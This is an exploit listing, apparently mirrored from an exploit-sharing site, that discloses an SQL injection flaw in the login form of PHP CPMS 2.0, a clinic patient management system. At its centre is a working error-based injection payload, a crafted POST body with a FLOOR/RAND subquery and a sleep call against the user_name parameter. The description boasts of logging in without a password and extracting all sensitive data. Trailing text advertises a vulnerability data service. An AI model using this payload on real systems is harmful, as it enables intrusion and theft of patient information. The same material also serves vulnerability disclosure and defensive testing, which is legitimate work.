Lucene search
K

PHP CPMS 2.0 SQL Injection Vulnerability

🗓️ 01 Jan 2025 00:00:00Reported by nu11secur1tyType 
zdt
 zdt
🔗 0day.today👁 292 Views

PHP CPMS 2.0 is vulnerable to SQL injection, allowing unauthorized access and data retrieval.

Code
# Titles: PHP - CPMS Version 2.0 SQLi
# Author: nu11secur1ty
# Vendor: https://github.com/oretnom23
# Software:
https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
# Reference: https://portswigger.net/web-security/sql-injection

## Description:
The user_name parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the user_name parameter, and a database
error message was returned. Two single quotes were then submitted and the
error message disappeared. You should review the contents of the error
message, and the application's handling of other input, to confirm whether
a vulnerability is present. The attacker can get all sensitive information
from this system when he attacks it online, He can login super easily
WITHOUT PASSWORD - ONLY USER - bypassing, and can crash or get every
sensitive information from him!

STATUS: HIGH-CRITICAL Vulnerability


[+]Payload:
- SQLi:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: user_name=mBHydNkQ'+(select (SELECT 1239 FROM(SELECT
COUNT(*),CONCAT(0x717a6b7871,(SELECT
(ELT(1239=1239,1))),0x71786a6a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY
x)a)from(select(sleep(20)))a)+'&password=s1L!p4i!O5&login=
---
```

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation